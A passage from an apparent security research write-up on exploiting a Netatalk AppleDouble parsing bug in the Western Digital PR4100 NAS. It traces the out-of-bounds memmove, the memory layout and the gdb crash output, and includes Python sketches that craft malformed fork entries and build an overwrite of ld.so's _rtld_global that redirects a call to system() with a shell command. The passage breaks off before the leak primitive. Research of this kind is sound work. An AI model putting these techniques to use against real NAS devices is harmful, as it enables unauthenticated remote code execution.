Here it is interesting to note that the Western Digital PR4100 has a Public AFP share by default which is available without requiring user authentication. This means we can reach all these post-authentication handlers as long as we target the Public share. It is also worth mentioning that the same Public share is available over the Server Message Block (SMB) protocol to the guest user, without requiring any password. It means we can read / create / modify any files over AFP or SMB as long as they are stored in the Public share.

The AFP command we are interested in is "FPOpenFork", which is handled by the afp_openfork() handler. As detailed previously, a fork file is a special type of file used to store metadata associated with a regular file. The fork file is stored in the AppleDouble file format. The afp_openfork() handler finds the volume and the path of the fork file to open, and calls ad_open() ("ad" stands for AppleDouble).

//netatalk-3.1.12/etc/afpd/fork.c
/* ----------------------- */
int afp_openfork(AFPObj *obj _U_, char *ibuf, size_t ibuflen _U_, char *rbuf, size_t *rbuflen)
{
    ...
    struct adouble  *adsame = NULL;
    ...
    if ((opened = of_findname(vol, s_path))) {
        adsame = opened->of_ad;
    }
    ...
    if ((ofork = of_alloc(vol, curdir, path, &ofrefnum, eid, adsame, st)) == NULL)
        return AFPERR_NFILE;
    ...
    /* First ad_open(), opens data or ressource fork */
    if (ad_open(ofork->of_ad, upath, adflags, 0666) < 0) {

The ad_open() function is quite generic in that it can open different fork files: a data fork file, a metadata fork file or a resource fork file. Since we are dealing with a resource fork here, we end up calling ad_open_rf() ("rf" stands for resource fork).

NOTE: ad_open() lives in the libatalk/ folder, whereas the code discussed so far lives in etc/afpd. Consequently, the code we analyse from now on is in libatalk.so.

//netatalk-3.1.12/libatalk/adouble/ad_open.c
/*!
 * Open data-, metadata(header)- or ressource fork
 *
 * ad_open(struct adouble *ad, const char *path, int adflags, int flags)
 * ad_open(struct adouble *ad, const char *path, int adflags, int flags, mode_t mode)
 *
 * You must call ad_init() before ad_open, usually you'll just call it like this: \n
 * @code
 *      struct adoube ad;
 *      ad_init(&ad, vol->v_adouble, vol->v_ad_options);
 * @endcode
 *
 * Open a files data fork, metadata fork or ressource fork.
 *
 * @param ad        (rw) pointer to struct adouble
 * @param path      (r)  Path to file or directory
 * @param adflags   (r)  Flags specifying which fork to open, can be or'd:
 *                         ADFLAGS_DF:        open data fork
 *                         ADFLAGS_RF:        open ressource fork
 *                         ADFLAGS_HF:        open header (metadata) file
 *                         ADFLAGS_NOHF:      it's not an error if header file couldn't be opened
 *                         ADFLAGS_NORF:      it's not an error if reso fork couldn't be opened
 *                         ADFLAGS_DIR:       if path is a directory you MUST or ADFLAGS_DIR to adflags
 *
 *                       Access mode for the forks:
 *                         ADFLAGS_RDONLY:    open read only
 *                         ADFLAGS_RDWR:      open read write
 *
 *                       Creation flags:
 *                         ADFLAGS_CREATE:    create if not existing
 *                         ADFLAGS_TRUNC:     truncate
 *
 *                       Special flags:
 *                         ADFLAGS_CHECK_OF:  check for open forks from us and other afpd's
 *                         ADFLAGS_SETSHRMD:  this adouble struct will be used to set sharemode locks.
 *                                            This basically results in the files being opened RW instead of RDONLY.
 * @param mode      (r)  mode used with O_CREATE
 *
 * The open mode flags (rw vs ro) have to take into account all the following requirements:
 * - we remember open fds for files because me must avoid a single close releasing fcntl locks for other
 *   fds of the same file
 *
 * BUGS:
 *
 * * on Solaris (HAVE_EAFD) ADFLAGS_RF doesn't work without
 *   ADFLAGS_HF, because it checks whether ad_meta_fileno() is already
 *   openend. As a workaround pass ADFLAGS_SETSHRMD.
 *
 * @returns 0 on success, any other value indicates an error
 */
int ad_open(struct adouble *ad, const char *path, int adflags, ...)
{
    ...
    if (adflags & ADFLAGS_RF) {
        if (ad_open_rf(path, adflags, mode, ad) != 0) {
            EC_FAIL;
        }
    }

ad_open_rf() then calls into ad_open_rf_ea():

//netatalk-3.1.12/libatalk/adouble/ad_open.c
/*!
 * Open ressource fork
 */
static int ad_open_rf(const char *path, int adflags, int mode, struct adouble *ad)
{
    int ret = 0;

    switch (ad->ad_vers) {
    case AD_VERSION2:
        ret = ad_open_rf_v2(path, adflags, mode, ad);
        break;
    case AD_VERSION_EA:
        ret = ad_open_rf_ea(path, adflags, mode, ad);
        break;
    default:
        ret = -1;
        break;
    }

    return ret;
}

The ad_open_rf_ea() function opens the resource fork file. Assuming the file already exists, it ends up calling into ad_header_read_osx() to read the actual content, which is in the AppleDouble format:

static int ad_open_rf_ea(const char *path, int adflags, int mode, struct adouble *ad)
{
    ...

#ifdef HAVE_EAFD
    ...
#else
    EC_NULL_LOG( rfpath = ad->ad_ops->ad_path(path, adflags) );
    if ((ad_reso_fileno(ad) = open(rfpath, oflags)) == -1) {
        ...
    }
#endif
    opened = 1;
    ad->ad_rfp->adf_refcount = 1;
    ad->ad_rfp->adf_flags = oflags;
    ad->ad_reso_refcount++;

#ifndef HAVE_EAFD
    EC_ZERO_LOG( fstat(ad_reso_fileno(ad), &st) );
    if (ad->ad_rfp->adf_flags & O_CREAT) {
        /* This is a new adouble header file, create it */
        LOG(log_debug, logtype_ad, "ad_open_rf(\"%s\"): created adouble rfork, initializing: \"%s\"",
            path, rfpath);
        EC_NEG1_LOG( new_ad_header(ad, path, NULL, adflags) );
        LOG(log_debug, logtype_ad, "ad_open_rf(\"%s\"): created adouble rfork, flushing: \"%s\"",
            path, rfpath);
        ad_flush(ad);
    } else {
        /* Read the adouble header */
        LOG(log_debug, logtype_ad, "ad_open_rf(\"%s\"): reading adouble rfork: \"%s\"",
            path, rfpath);
        EC_NEG1_LOG( ad_header_read_osx(rfpath, ad, &st) );
    }
#endif

We have finally reached our vulnerable function: ad_header_read_osx().

Understanding the vulnerability

The ad_header_read_osx() reads the content of the resource fork i.e. interprets it in the AppleDouble file format. Netatalk stores elements of the AppleDouble file format inside its own adouble structure that we will detail soon. ad_header_read_osx() starts by reading the AppleDouble header to determine how many entries there are.

//netatalk-3.1.12/libatalk/adouble/ad_open.c
/* Read an ._ file, only uses the resofork, finderinfo is taken from EA */
static int ad_header_read_osx(const char *path, struct adouble *ad, const struct stat *hst)
{
    ...
    struct adouble      adosx;
    ...
    LOG(log_debug, logtype_ad, "ad_header_read_osx: %s", path ? fullpathname(path) : "");
    ad_init_old(&adosx, AD_VERSION_EA, ad->ad_options);
    buf = &adosx.ad_data[0];
    memset(buf, 0, sizeof(adosx.ad_data));
    adosx.ad_rfp->adf_fd = ad_reso_fileno(ad);

    /* read the header */
    EC_NEG1( header_len = adf_pread(ad->ad_rfp, buf, AD_DATASZ_OSX, 0) );
    ...
    memcpy(&adosx.ad_magic, buf, sizeof(adosx.ad_magic));
    memcpy(&adosx.ad_version, buf + ADEDOFF_VERSION, sizeof(adosx.ad_version));
    adosx.ad_magic = ntohl(adosx.ad_magic);
    adosx.ad_version = ntohl(adosx.ad_version);
    ...
    memcpy(&nentries, buf + ADEDOFF_NENTRIES, sizeof( nentries ));
    nentries = ntohs(nentries);
    len = nentries * AD_ENTRY_LEN;

Then we see it calls into parse_entries() to parse the different AppleDouble entries. What is interesting below is that if parse_entries() fails, it logs an error but does not exit.

    nentries = len / AD_ENTRY_LEN;
    if (parse_entries(&adosx, buf, nentries) != 0) {
        LOG(log_warning, logtype_ad, "ad_header_read(%s): malformed AppleDouble",
            path ? fullpathname(path) : "");
    }

If we look closer at parse_entries(), we see that it sets an error if one of the following conditions occurs:

  • The AppleDouble "eid" is zero or greater than ADEID_MAX
  • The AppleDouble "offset" is out of bounds
  • The "eid" does not refer to a resource fork and the AppleDouble "offset" added to the length of the data is out of bounds

We know we are dealing with resource forks, so the second condition is interesting. In short, it means we can provide an out-of-bounds AppleDouble "offset": parse_entries() returns an error, but ad_header_read_osx() ignores that error and continues processing.

//netatalk-3.1.12/libatalk/adouble/ad_open.c
/**
 * Read an AppleDouble buffer, returns 0 on success, -1 if an entry was malformatted
 **/
static int parse_entries(struct adouble *ad, char *buf, uint16_t nentries)
{
    uint32_t   eid, len, off;
    int        ret = 0;

    /* now, read in the entry bits */
    for (; nentries > 0; nentries-- ) {
        memcpy(&eid, buf, sizeof( eid ));
        eid = get_eid(ntohl(eid));
        buf += sizeof( eid );
        memcpy(&off, buf, sizeof( off ));
        off = ntohl( off );
        buf += sizeof( off );
        memcpy(&len, buf, sizeof( len ));
        len = ntohl( len );
        buf += sizeof( len );

        ad->ad_eid[eid].ade_off = off;
        ad->ad_eid[eid].ade_len = len;

        if (!eid
            || eid > ADEID_MAX
            || off >= sizeof(ad->ad_data)
            || ((eid != ADEID_RFORK) && (off + len >  sizeof(ad->ad_data))))
        {
            ret = -1;
            LOG(log_warning, logtype_ad, "parse_entries: bogus eid: %u, off: %u, len: %u",
                (uint)eid, (uint)off, (uint)len);
        }
    }

    return ret;
}
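
The effect of the unchecked return value can be reproduced with a small model. This is a sketch under stated assumptions: the values of ADEID_MAX and AD_DATASZ_MAX are placeholders to be checked against adouble.h, the get_eid() mapping is omitted, and read_header_checked() is a hypothetical variant shown only for contrast. It is not claimed to be the upstream fix.

```python
import struct

AD_ENTRY_LEN = 12
ADEID_RFORK = 2
ADEID_FINDERI = 9
ADEID_MAX = 20        # assumed value, check adouble.h
AD_DATASZ_MAX = 1024  # assumed value, check adouble.h


def parse_entries(ad_eid: dict, buf: bytes, nentries: int) -> int:
    """Model of the C logic: store first, validate afterwards, return 0 or -1."""
    ret = 0
    for i in range(nentries):
        eid, off, length = struct.unpack_from(">III", buf, i * AD_ENTRY_LEN)
        ad_eid[eid] = (off, length)  # stored before any validation, as in the C code
        if (eid == 0 or eid > ADEID_MAX or off >= AD_DATASZ_MAX
                or (eid != ADEID_RFORK and off + length > AD_DATASZ_MAX)):
            ret = -1
    return ret


def read_header_unchecked(buf: bytes, nentries: int) -> dict:
    """Like ad_header_read_osx(): note the error, then carry on regardless."""
    ad_eid = {}
    if parse_entries(ad_eid, buf, nentries) != 0:
        pass  # the C code only logs a warning here
    return ad_eid


def read_header_checked(buf: bytes, nentries: int) -> dict:
    """Hypothetical variant that refuses malformed input."""
    ad_eid = {}
    if parse_entries(ad_eid, buf, nentries) != 0:
        raise ValueError("malformed AppleDouble")
    return ad_eid


# Two entry descriptors; the resource fork offset is far outside ad_data.
crafted = struct.pack(">III", ADEID_FINDERI, 0x32, 0x20)
crafted += struct.pack(">III", ADEID_RFORK, 0xBEEF00, 0x100)

print(read_header_unchecked(crafted, 2))
```

With the unchecked reader, the out-of-bounds offset ends up in the entry table and is available to every later consumer of that table.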

From here, it is useful to know what mitigations are in place to know what we are going to need to bypass and also analyse the code after parse_entries() returns to know what kind of exploitation primitives we can build.

Exploitation

Mitigations in place

Checking the ASLR settings of the kernel:

root@MyCloudPR4100 ~ # cat /proc/sys/kernel/randomize_va_space
2

From here:

  • 0 – Disable ASLR. This setting is applied if the kernel is booted with the norandmaps boot parameter.
  • 1 – Randomize the positions of the stack, virtual dynamic shared object (VDSO) page, and shared memory regions. The base address of the data segment is located immediately after the end of the executable code segment.
  • 2 – Randomize the positions of the stack, VDSO page, shared memory regions, and the data segment. This is the default setting.

Checking the mitigations of the afpd binary using checksec.py:

[*] '/home/cedric/pwn2own/firmware/wd_pr4100/_WDMyCloudPR4100_5.17.107_prod.bin.extracted/squashfs-root/usr/sbin/afpd'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      PIE enabled

So to summarize:

  • afpd: randomized
    • .text: read/execute
    • .data: read/write
  • Libraries: randomized
  • Heap: randomized
  • Stack: randomized

Since everything is randomized, we are going to need some kind of leak primitive to bypass ASLR. We still need to investigate if we can trigger a path where an out of bound offset access is useful for exploitation.

Finding good exploitation primitives

Let’s analyse the code in ad_header_read_osx() again. Assume the previously discussed parse_entries() function has parsed an AppleDouble file in which some entries have out-of-bounds offsets, and let’s see what we can do after it returns. Provided the condition ad_getentrylen(&adosx, ADEID_FINDERI) != ADEDLEN_FINDERI holds, that is, the FinderInfo entry is not exactly 32 bytes long, the code ends up calling ad_convert_osx().

    nentries = len / AD_ENTRY_LEN;
    if (parse_entries(&adosx, buf, nentries) != 0) {
        LOG(log_warning, logtype_ad, "ad_header_read(%s): malformed AppleDouble",
            path ? fullpathname(path) : "");
    }

    if (ad_getentrylen(&adosx, ADEID_FINDERI) != ADEDLEN_FINDERI) {
        LOG(log_warning, logtype_ad, "Convert OS X to Netatalk AppleDouble: %s",
            path ? fullpathname(path) : "");

        if (retry_read > 0) {
            LOG(log_error, logtype_ad, "ad_header_read_osx: %s, giving up", path ? fullpathname(path) : "");
            errno = EIO;
            EC_FAIL;
        }
        retry_read++;
        if (ad_convert_osx(path, &adosx) == 1) {
            goto reread;
        }
        errno = EIO;
        EC_FAIL;
    }

As the comment below states, the ad_convert_osx() function is responsible for converting Apple’s AppleDouble file format to the simplified version of the format that is implemented in Netatalk.

We see that the ad_convert_osx() function starts by mapping the original fork file (in the AppleDouble file format) in memory. Then it calls memmove() to discard the FinderInfo part and to move the rest on top of it.

//netatalk-3.1.12/libatalk/adouble/ad_open.c
/**
 * Convert from Apple's ._ file to Netatalk
 *
 * Apple's AppleDouble may contain a FinderInfo entry longer then 32 bytes
 * containing packed xattrs. Netatalk can't deal with that, so we
 * simply discard the packed xattrs.
 *
 * As we call ad_open() which might result in a recursion, just to be sure
 * use static variable in_conversion to check for that.
 *
 * Returns -1 in case an error occured, 0 if no conversion was done, 1 otherwise
 **/
static int ad_convert_osx(const char *path, struct adouble *ad)
{
    EC_INIT;
    static bool in_conversion = false;
    char *map;
    int finderlen = ad_getentrylen(ad, ADEID_FINDERI);
    ssize_t origlen;

    if (in_conversion || finderlen == ADEDLEN_FINDERI)
        return 0;
    in_conversion = true;

    LOG(log_debug, logtype_ad, "Converting OS X AppleDouble %s, FinderInfo length: %d",
        fullpathname(path), finderlen);

    origlen = ad_getentryoff(ad, ADEID_RFORK) + ad_getentrylen(ad, ADEID_RFORK);

    map = mmap(NULL, origlen, PROT_READ | PROT_WRITE, MAP_SHARED, ad_reso_fileno(ad), 0);
    if (map == MAP_FAILED) {
        LOG(log_error, logtype_ad, "mmap AppleDouble: %s\n", strerror(errno));
        EC_FAIL;
    }

    memmove(map + ad_getentryoff(ad, ADEID_FINDERI) + ADEDLEN_FINDERI,
            map + ad_getentryoff(ad, ADEID_RFORK),
            ad_getentrylen(ad, ADEID_RFORK));

Here it is time to look at the adouble structure. The important fields for us are ad_eid[] and ad_data[]. The adouble structure was already populated when the AppleDouble file was read. So we control all these fields.

//netatalk-3.1.12/include/atalk/adouble.h
struct ad_entry {
    off_t     ade_off;
    ssize_t   ade_len;
};

struct adouble {
    uint32_t            ad_magic;         /* Official adouble magic                   */
    uint32_t            ad_version;       /* Official adouble version number          */
    char                ad_filler[16];
    struct ad_entry     ad_eid[ADEID_MAX];

    ...
    char                ad_data[AD_DATASZ_MAX];
};

The functions/macros used to access the EID offset or length fields, as well as the data content are pretty self explanatory:

  • ad_getentryoff(): get an EID offset value
  • ad_getentrylen(): get an EID length value
  • ad_entry(): get the data associated with an EID (by retrieving it from the above offset)

//netatalk-3.1.12/libatalk/adouble/ad_open.c
off_t ad_getentryoff(const struct adouble *ad, int eid)
{
    if (ad->ad_vers == AD_VERSION2)
        return ad->ad_eid[eid].ade_off;

    switch (eid) {
    case ADEID_DFORK:
        return 0;
    case ADEID_RFORK:
#ifdef HAVE_EAFD
        return 0;
#else
        return ad->ad_eid[eid].ade_off;
#endif
    default:
        return ad->ad_eid[eid].ade_off;
    }
    /* deadc0de */
    AFP_PANIC("What am I doing here?");
}

//netatalk-3.1.12/include/atalk/adouble.h
#define ad_getentrylen(ad,eid)     ((ad)->ad_eid[(eid)].ade_len)
#define ad_setentrylen(ad,eid,len) ((ad)->ad_eid[(eid)].ade_len = (len))
#define ad_setentryoff(ad,eid,off) ((ad)->ad_eid[(eid)].ade_off = (off))
#define ad_entry(ad,eid)           ((caddr_t)(ad)->ad_data + (ad)->ad_eid[(eid)].ade_off)

So we control all the fields in the AppleDouble file format. More precisely, we know we can craft an invalid EID "offset" for all the entries we need, due to the previously discussed parse_entries() unchecked return value. Moreover, we can craft a resource fork of the size we want by having larger data. This means we can effectively control the source, destination and length of the memmove() call to write data we control outside of the memory mapping.

NOTE: the entries we want to target are ADEID_FINDERI and ADEID_RFORK:

    memmove(map + ad_getentryoff(ad, ADEID_FINDERI) + ADEDLEN_FINDERI,
            map + ad_getentryoff(ad, ADEID_RFORK),
            ad_getentrylen(ad, ADEID_RFORK));
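
To make the pointer arithmetic concrete, here is a minimal Python sketch of how the mmap() length and the three memmove() arguments derive from the entries we control. Only the formulas and the 32-byte FinderInfo length come from the Netatalk code above; the helper names and the sample offsets are illustrative assumptions and are not the values used by the real exploit.

```python
ADEDLEN_FINDERI = 32  # FinderInfo length that Netatalk expects


def mapping_length(rfork_off, rfork_len):
    """origlen as computed in ad_convert_osx()."""
    return rfork_off + rfork_len


def memmove_args(map_base, finderi_off, rfork_off, rfork_len):
    """Return (dst, src, length) the same way ad_convert_osx() computes them."""
    dst = map_base + finderi_off + ADEDLEN_FINDERI
    src = map_base + rfork_off
    return dst, src, rfork_len


def escapes_mapping(map_base, origlen, dst, length):
    """True if any destination byte falls outside [map_base, map_base + origlen)."""
    return dst < map_base or dst + length > map_base + origlen


# Hypothetical values: a small fork file and a bogus FinderInfo offset.
MAP_BASE = 0x7f6c581b2000            # illustrative mapping address
RFORK_OFF, RFORK_LEN = 0x52, 0x100   # illustrative resource fork entry
FINDERI_OFF = 0xC000                 # illustrative offset far past the file

origlen = mapping_length(RFORK_OFF, RFORK_LEN)
dst, src, n = memmove_args(MAP_BASE, FINDERI_OFF, RFORK_OFF, RFORK_LEN)
out_of_bounds = escapes_mapping(MAP_BASE, origlen, dst, n)
print(hex(origlen), hex(dst), hex(src), hex(n), out_of_bounds)
```

Because nothing validates the FinderInfo offset against origlen, the destination is simply whatever offset we choose relative to the mapping.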

The next question that comes to mind is: where does the memory mapping get mapped?

From testing, it turns out that if the fork file is smaller than 0x1000 bytes, the file is mapped at a fairly high address, just before the uams_pam.so, uams_guest.so and ld-2.28.so mappings. More precisely, the ld-2.28.so mapping always starts 0xC000 bytes after the beginning of the mapped file, even if ASLR is in place:

(gdb) info proc mappings 
process 26343
Mapped address spaces:

          Start Addr           End Addr       Size     Offset objfile
      0x5579bb534000     0x5579bb53d000     0x9000        0x0 /usr/local/modules/usr/sbin/afpd
      0x5579bb53d000     0x5579bb571000    0x34000     0x9000 /usr/local/modules/usr/sbin/afpd
      0x5579bb571000     0x5579bb57c000     0xb000    0x3d000 /usr/local/modules/usr/sbin/afpd
      0x5579bb57c000     0x5579bb57d000     0x1000    0x47000 /usr/local/modules/usr/sbin/afpd
      0x5579bb57d000     0x5579bb580000     0x3000    0x48000 /usr/local/modules/usr/sbin/afpd
      0x5579bb580000     0x5579bb5a0000    0x20000        0x0 
      0x5579bcd51000     0x5579bcd72000    0x21000        0x0 [heap]
      0x5579bcd72000     0x5579bcd92000    0x20000        0x0 [heap]
      0x7f6c56e30000     0x7f6c56eb0000    0x80000        0x0 
      ...
      0x7f6c57e02000     0x7f6c57e24000    0x22000        0x0 /lib/libc-2.28.so
      0x7f6c57e24000     0x7f6c57f6c000   0x148000    0x22000 /lib/libc-2.28.so
      0x7f6c57f6c000     0x7f6c57fb8000    0x4c000   0x16a000 /lib/libc-2.28.so
      0x7f6c57fb8000     0x7f6c57fb9000     0x1000   0x1b6000 /lib/libc-2.28.so
      0x7f6c57fb9000     0x7f6c57fbd000     0x4000   0x1b6000 /lib/libc-2.28.so
      0x7f6c57fbd000     0x7f6c57fbf000     0x2000   0x1ba000 /lib/libc-2.28.so
      ...
      0x7f6c58129000     0x7f6c58134000     0xb000        0x0 /usr/local/modules/lib/libatalk.so.18.0.0
      0x7f6c58134000     0x7f6c58177000    0x43000     0xb000 /usr/local/modules/lib/libatalk.so.18.0.0
      0x7f6c58177000     0x7f6c58191000    0x1a000    0x4e000 /usr/local/modules/lib/libatalk.so.18.0.0
      0x7f6c58191000     0x7f6c58192000     0x1000    0x67000 /usr/local/modules/lib/libatalk.so.18.0.0
      0x7f6c58192000     0x7f6c58194000     0x2000    0x68000 /usr/local/modules/lib/libatalk.so.18.0.0
      0x7f6c58194000     0x7f6c581b1000    0x1d000        0x0 
      0x7f6c581b2000     0x7f6c581b3000     0x1000        0x0 /mnt/HD/HD_a2/Public/edg/._mooncake
      0x7f6c581b3000     0x7f6c581b4000     0x1000        0x0 /usr/local/modules/lib/netatalk/uams_pam.so
      0x7f6c581b4000     0x7f6c581b6000     0x2000     0x1000 /usr/local/modules/lib/netatalk/uams_pam.so
      0x7f6c581b6000     0x7f6c581b7000     0x1000     0x3000 /usr/local/modules/lib/netatalk/uams_pam.so
      0x7f6c581b7000     0x7f6c581b8000     0x1000     0x3000 /usr/local/modules/lib/netatalk/uams_pam.so
      0x7f6c581b8000     0x7f6c581b9000     0x1000     0x4000 /usr/local/modules/lib/netatalk/uams_pam.so
      0x7f6c581b9000     0x7f6c581ba000     0x1000        0x0 /usr/local/modules/lib/netatalk/uams_guest.so
      0x7f6c581ba000     0x7f6c581bb000     0x1000     0x1000 /usr/local/modules/lib/netatalk/uams_guest.so
      0x7f6c581bb000     0x7f6c581bc000     0x1000     0x2000 /usr/local/modules/lib/netatalk/uams_guest.so
      0x7f6c581bc000     0x7f6c581bd000     0x1000     0x2000 /usr/local/modules/lib/netatalk/uams_guest.so
      0x7f6c581bd000     0x7f6c581be000     0x1000     0x3000 /usr/local/modules/lib/netatalk/uams_guest.so
      0x7f6c581be000     0x7f6c581bf000     0x1000        0x0 /lib/ld-2.28.so
      0x7f6c581bf000     0x7f6c581dd000    0x1e000     0x1000 /lib/ld-2.28.so
      0x7f6c581dd000     0x7f6c581e5000     0x8000    0x1f000 /lib/ld-2.28.so
      0x7f6c581e5000     0x7f6c581e6000     0x1000    0x26000 /lib/ld-2.28.so
      0x7f6c581e6000     0x7f6c581e7000     0x1000    0x27000 /lib/ld-2.28.so
      0x7f6c581e7000     0x7f6c581e8000     0x1000        0x0 
      0x7ffe86f2b000     0x7ffe86f71000    0x46000        0x0 [stack]
      0x7ffe86fb7000     0x7ffe86fba000     0x3000        0x0 [vvar]
      0x7ffe86fba000     0x7ffe86fbc000     0x2000        0x0 [vdso]
  0xffffffffff600000 0xffffffffff601000     0x1000        0x0 [vsyscall]
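
As a quick sanity check of the 0xC000 figure, the following Python sketch subtracts the start addresses shown in the listing above. The constant names are illustrative; the addresses are copied from the gdb output and will differ on every run because of ASLR, while the deltas are what we observed to stay constant.

```python
# Start addresses copied from the "info proc mappings" listing above.
MOONCAKE_MAP = 0x7f6c581b2000  # /mnt/HD/HD_a2/Public/edg/._mooncake
UAMS_PAM = 0x7f6c581b3000      # first uams_pam.so mapping
UAMS_GUEST = 0x7f6c581b9000    # first uams_guest.so mapping
LD_SO = 0x7f6c581be000         # first ld-2.28.so mapping
LD_SO_END = 0x7f6c581e7000     # end of the last ld-2.28.so mapping


def delta(target, base=MOONCAKE_MAP):
    """Distance in bytes from the start of the mapped fork file."""
    return target - base


for name, addr in [("uams_pam.so", UAMS_PAM),
                   ("uams_guest.so", UAMS_GUEST),
                   ("ld-2.28.so", LD_SO),
                   ("end of ld-2.28.so", LD_SO_END)]:
    print(f"{name:18} +{delta(addr):#x}")
```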

This means we could use the memmove() to overwrite some data in one of the mentioned libraries. But which library should we target?

While debugging, we noticed that when a crash occurs, if we continue execution, a special exception handler in Netatalk catches the exception to handle it.

More specifically, we overwrote the whole ld-2.28.so .data section and ended up with the following crash:

(remote-gdb) bt
#0  0x00007f423de3eb50 in _dl_open (file=0x7f423dbf0e86 "libgcc_s.so.1", mode=-2147483646, caller_dlopen=0x7f423db771c5 <init+21>, nsid=-2, argc=4, argv=0x7fffa4967cf8, env=0x7fffa4967d20) at dl-open.c:548
#1  0x00007f423dba406d in do_dlopen (Reading in symbols for dl-error.c...done.
ptr=ptr@entry=0x7fffa4966170) at dl-libc.c:96
#2  0x00007f423dba4b2f in __GI__dl_catch_exception (exception=exception@entry=0x7fffa49660f0, operate=operate@entry=0x7f423dba4030 <do_dlopen>, args=args@entry=0x7fffa4966170) at dl-error-skeleton.c:196
#3  0x00007f423dba4bbf in __GI__dl_catch_error (objname=objname@entry=0x7fffa4966148, errstring=errstring@entry=0x7fffa4966150, mallocedp=mallocedp@entry=0x7fffa4966147, operate=operate@entry=0x7f423dba4030 <do_dlopen>, args=args@entry=0x7fffa4966170) at dl-error-skeleton.c:215
#4  0x00007f423dba4147 in dlerror_run (operate=operate@entry=0x7f423dba4030 <do_dlopen>, args=args@entry=0x7fffa4966170) at dl-libc.c:46
#5  0x00007f423dba41d6 in __GI___libc_dlopen_mode (name=name@entry=0x7f423dbf0e86 "libgcc_s.so.1", mode=mode@entry=-2147483646) at dl-libc.c:195
#6  0x00007f423db771c5 in init () at backtrace.c:53
Reading in symbols for pthread_once.c...done.
#7  0x00007f423dc40997 in __pthread_once_slow (once_control=0x7f423dc2ef80 <once>, init_routine=0x7f423db771b0 <init>) at pthread_once.c:116
#8  0x00007f423db77304 in __GI___backtrace (array=<optimised out>, size=<optimised out>) at backtrace.c:106
#9  0x00007f423ddcd6db in netatalk_panic () from symbols/lib64/libatalk.so.18
#10 0x00007f423ddcd902 in ?? () from symbols/lib64/libatalk.so.18
#11 0x00007f423ddcd958 in ?? () from symbols/lib64/libatalk.so.18
Reading in symbols for ../sysdeps/unix/sysv/linux/x86_64/sigaction.c...done.
#12 <signal handler called>
#13 __memmove_sse2_unaligned_erms () at ../sysdeps/x86_64/multiarch/memmove-vec-unaligned-erms.S:238
#14 0x00007f423dda6fd0 in ad_rebuild_adouble_header_osx () from symbols/lib64/libatalk.so.18
#15 0x00007f423ddaa985 in ?? () from symbols/lib64/libatalk.so.18
#16 0x00007f423ddaaf34 in ?? () from symbols/lib64/libatalk.so.18
#17 0x00007f423ddad7b0 in ?? () from symbols/lib64/libatalk.so.18
#18 0x00007f423ddad9e1 in ?? () from symbols/lib64/libatalk.so.18
#19 0x00007f423ddae56c in ad_open () from symbols/lib64/libatalk.so.18
#20 0x000055cd275c1ea7 in afp_openfork ()
#21 0x000055cd275a386e in afp_over_dsi ()
#22 0x000055cd275c6ba3 in ?? ()
#23 0x000055cd275c68fd in main ()

We can see that it crashes on a call instruction where we control both the function pointer being called and its first argument.

(remote-gdb) x /i $pc
=> 0x7f423de3eb50 <_dl_open+48>:	call   QWORD PTR [rip+0x16412]        # 0x7f423de54f68 <_rtld_global+3848>
(remote-gdb) x /gx 0x7f423de54f68
0x7f423de54f68 <_rtld_global+3848>:	0x4242424242424242
(remote-gdb) x /s $rdi
0x7f423de54968 <_rtld_global+2312>:	'A' <repeats 35 times>
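
The addresses in this gdb output can be cross-checked with a little arithmetic. The sketch below is only a verification aid with illustrative variable names. It relies on the fact that a RIP-relative call of this form is encoded in 6 bytes (FF 15 followed by a 32-bit displacement), and that the displacement is applied to the address of the next instruction.

```python
PC = 0x7f423de3eb50   # address of the faulting call in _dl_open
DISP = 0x16412        # displacement shown in the disassembly
CALL_LEN = 6          # FF 15 <disp32>

# RIP-relative operands are resolved against the *next* instruction.
slot = PC + CALL_LEN + DISP

# gdb labels the slot _rtld_global+3848 and $rdi _rtld_global+2312.
rtld_global = slot - 3848
lock = rtld_global + 2312

print(hex(slot))         # memory slot holding the function pointer
print(hex(rtld_global))  # start of _rtld_global in this run
print(hex(lock))         # value passed in $rdi
print(hex(slot - lock))  # gap between the lock and the function pointer
```

The 0x600 bytes separating the lock from the function pointer bound how much controlled data can follow the start of the lock before the pointer itself is reached.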

Checking ld-2.28.so in IDA, we see that it is due to dl_open() calling the _dl_rtld_lock_recursive function pointer and passing a pointer to the _dl_load_lock lock.

void *__fastcall dl_open(
        const char *file,
        int mode,
        const void *caller_dlopen,
        Lmid_t nsid,
        int argc,
        char **argv,
        char **env)
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

  if ( (mode & 3) == 0 )
    _dl_signal_error(0x16, file, 0LL, "invalid mode for dlopen()");
  rtld_local._dl_rtld_lock_recursive(&rtld_local._dl_load_lock);

Both the function pointer and the lock argument are part of the _rtld_local global which resides in the .data section.

.data:0000000000028060 ; rtld_global rtld_local
.data:0000000000028060 _rtld_local     dq 0  

This makes it quite a generic method to call an arbitrary function with one argument when we are able to overwrite the ld.so .data section.

NOTE: a similar (though slightly different) technique was detailed here.

Our goal is to execute an arbitrary command by overwriting the lock to contain a shell command to execute and overwriting the function pointer with the system() address.
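
A minimal Python sketch of what such an overwrite buffer could look like is shown below. It assumes the two offsets visible in the gdb output above (_rtld_global+2312 for the lock, _rtld_global+3848 for the function pointer), which are specific to this ld-2.28.so build. The function name, the filler byte and the example address are hypothetical, and this is not the layout used by our exploit: blindly filling the rest of the structure with filler clobbers other loader state.

```python
import struct

LOCK_OFF = 2312  # _rtld_global+2312: _dl_load_lock (pointed to by $rdi)
FPTR_OFF = 3848  # _rtld_global+3848: _dl_rtld_lock_recursive (call target)


def build_rtld_overwrite(command: bytes, system_addr: int) -> bytes:
    """Return bytes meant to be written starting at _rtld_global.

    The command string lands on the lock and the 8-byte little-endian
    address lands on the function pointer; everything else is filler.
    """
    if b"\x00" in command:
        raise ValueError("command must not contain NUL bytes")
    if len(command) + 1 > FPTR_OFF - LOCK_OFF:
        raise ValueError("command would run into the function pointer")
    buf = bytearray(b"A" * (FPTR_OFF + 8))
    buf[LOCK_OFF:LOCK_OFF + len(command) + 1] = command + b"\x00"
    buf[FPTR_OFF:FPTR_OFF + 8] = struct.pack("<Q", system_addr)
    return bytes(buf)


# Hypothetical inputs, for illustration only.
payload = build_rtld_overwrite(b"id > /tmp/out", 0x7f0000001234)
print(len(payload))
```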

Luckily, we already know that data we control is passed as the argument to the function pointer, so we don’t need to know where that data is in memory. However, due to ASLR, we have no idea where the system() function is. So we need some kind of leak primitive to bypass ASLR.

Building a leak primitive

